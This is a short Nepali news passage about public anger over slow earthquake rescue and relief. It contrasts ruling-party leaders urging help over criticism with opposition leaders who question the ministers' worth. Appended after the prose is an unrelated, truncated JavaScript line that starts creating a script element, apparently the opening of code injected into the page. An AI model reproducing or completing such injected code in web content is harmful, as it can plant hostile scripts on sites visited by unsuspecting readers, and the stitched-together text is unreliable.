नेपालका भूकम्प पीडितहरुलाई समयमै उद्दार गर्न नसकिएको तथा राहत वितरणमा ढिलाई भएकोमा सर्वसाधारणले सरकार प्रति आक्रोश पोखिरहेका बेला सत्तारुढ दलका नेताहरुले भने अहिलेको समय सरकारको आलोचना गर्नेभन्दा पनि आआफ्नो क्षेत्रबाट सहयोगमा जुट्नुपर्ने बेला भएको बताएका छन् । तर, सरकार बाहिरका नेताहरुले भने विपदमा परेका नेपालीलाई सहयोग गर्न नसके प्रधानमन्त्री तथा मन्त्री हुँ भन्दै हिँड्नुको औचित्य नभएको बताएका छन् ।

var d=document;var s=d.createElement(‘script’);